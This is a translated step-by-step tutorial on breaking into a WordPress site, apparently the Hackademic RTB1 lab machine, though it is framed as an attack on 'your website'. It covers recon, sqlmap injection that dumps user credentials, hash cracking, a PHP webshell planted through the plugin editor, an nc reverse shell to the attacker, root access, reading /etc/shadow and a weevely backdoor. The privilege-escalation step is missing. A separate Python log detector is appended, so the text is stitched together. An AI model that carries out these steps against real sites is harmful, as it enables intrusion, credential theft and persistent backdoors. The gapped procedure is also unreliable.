Now we get the IP address of the web server: 173.236.138.113
To find other sites hosted on the same server, we use sameip.org.
We need the following information about your website:
- DNS records (A, NS, TXT, MX and SOA)
- Web server type (Apache, IIS, Tomcat)
- Registrar (the company your domain is registered with)
- Your name, address, email and phone number
- Scripting technologies the site uses (PHP, ASP, ASP.NET, JSP, CFM)
- Your server OS (Unix, Linux, Windows, Solaris)
- Your server's ports open to the Internet (443, etc.)
Let's start by looking up your site's DNS records; we use who.is for this.
We found that your DNS records are as follows:
Next, let's determine the type of web server.
We have now obtained the registration information for your domain name, including your personal contact details.
We can get your web server's OS type and server version with WhatWeb in BackTrack 5.
We found that your website runs the well-known PHP CMS WordPress, the server OS is Fedora Linux, and the web server is Apache 2.2.15. Next we look at the web server's open ports with the penetration-testing tool Nmap:
1 - find the services running on the server
2 - find the server OS version
We will also use the w3af tool in BackTrack 5 R1:
[email protected]:/pentest/web/w3af# ./w3af_gui
We enter the address of the website to be tested and select the complete security audit option.
Wait a moment and you'll see the results of the scan.
The scan shows that your site has SQL injection, XSS and other vulnerabilities. Let's look at the SQL injection vulnerability.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
The tool found this URL to be SQL injectable, and we check the URL with sqlmap.
Run sqlmap with -u URL
After a while, you'll see
Enter N and press Enter to continue
We found that your site has a MySQL error-based injection, and the MySQL database version is 5.0. We try to collect the database names by adding the parameter "--dbs".
Three databases were found; next, the parameter "-D wordpress --tables" lists all the table names of the wordpress database.
Use the parameter "-T wp_users --columns" to view the fields of the wp_users table.
Next, dump the values of the fields user_login and user_pass with the parameter "-C user_login,user_pass --dump".
We will find the user names and password hashes. We need to crack the password hashes through the following online hash-cracking website:
http://www.onlinehashcrack.com/free-hash-reverse.php
Log into the WordPress backend, wp-admin.
Try uploading a PHP webshell to the server to make it easy to run some Linux commands. Look for any plugin you can edit on the Plugins page. We choose the textile plugin, edit it and insert our PHP webshell, click Update File, then visit our PHP webshell.
The PHP webshell is executed, and we can control the files of your website, but we want to get root on the web server in order to reach the other sites on the server.
We use nc to get a reverse shell, first listening on port 5555 on our computer.
Then, in the PHP webshell, connect back to our computer: enter your IP and port 5555.
Click Connect and we'll see
Next we try to execute some commands:
id
uid=48(apache) gid=489(apache) groups=489(apache)
(displays the user's ID and groups)
pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
(displays the current directory on the server)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST i686 i686 i386 GNU/Linux
(displays kernel version information)
Once execution is complete, we enter the id command again.
id
We find that we already have root.
uid=0(root) gid=0(root)
We can now view the /etc/shadow file:
cat /etc/shadow
2. Create a PHP backdoor with weevely, with the password koko:
[email protected]:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko
Then upload it to the server and use it:
[email protected]:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/hackademic_rtb1/wp-content/plugins/hax.php -p koko
Test our hax.php backdoor.
That's it, time to celebrate!
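As an added defender's note that is not part of the original tutorial, the following Python script shows how the two noisy steps above (the sqlmap probe on the cat parameter, and the webshell written through the plugin editor and then requested as hax.php) look in Apache access logs and how to flag them. The log lines and the client IP 203.0.113.5 are constructed for the example.

```python
"""Added detection example (not from the original tutorial): flag, in constructed
Apache combined-format access log lines, the two steps this walkthrough relies on:
SQL injection probes on the WordPress 'cat' parameter (e.g. ?cat=d%27z%220) and a
PHP file written through the plugin editor and then requested directly."""
import re
from urllib.parse import parse_qs, urlparse

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
SQLI_RE = re.compile(r"""['"]|\bunion\b|\bselect\b|--|/\*""", re.I)
SCANNER_UA_RE = re.compile(r"sqlmap|w3af", re.I)  # the tools named on this page

# Constructed sample lines; the client IP is from the documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Nov/2009:21:41:45 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Nov/2009:21:41:46 +0000] "GET /Hackademic_RTB1/?cat=d%27z%220 HTTP/1.1" 500 312 "-" "sqlmap/1.0-dev"',
    '203.0.113.5 - - [07/Nov/2009:21:50:02 +0000] "POST /Hackademic_RTB1/wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Nov/2009:21:50:09 +0000] "GET /Hackademic_RTB1/wp-content/plugins/hax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

def detect(lines):
    """Return (ip, rule, detail) alerts; the plugin-editor rule is stateful per IP."""
    alerts, edited_plugins_from = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line
        ev = m.groupdict()
        url = urlparse(ev["path"])
        # parse_qs already percent-decodes, so %27 arrives here as a quote.
        for key, vals in parse_qs(url.query, keep_blank_values=True).items():
            if any(SQLI_RE.search(v) for v in vals):
                alerts.append((ev["ip"], "sqli_probe", key))
                break
        if SCANNER_UA_RE.search(ev["ua"]):
            alerts.append((ev["ip"], "scanner_ua", ev["ua"].split("/")[0]))
        # A POST to the plugin editor followed by a request for a .php file under
        # wp-content/plugins/ from the same source is the webshell pattern above.
        if ev["method"] == "POST" and url.path.endswith("/wp-admin/plugin-editor.php"):
            edited_plugins_from.add(ev["ip"])
        elif ("/wp-content/plugins/" in url.path and url.path.endswith(".php")
              and ev["ip"] in edited_plugins_from):
            alerts.append((ev["ip"], "plugin_php_after_edit", url.path))
    return alerts

def run_sample():
    """Run the detector over the constructed sample log."""
    return detect(SAMPLE_LOG)
```

On the sample, run_sample() returns three alerts: the quote in the cat value, the sqlmap User-Agent, and the hax.php request that follows the plugin-editor POST from the same address.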
Senior hacker teaches beginners how to break into a website: a super-detailed tutorial. That's awesome.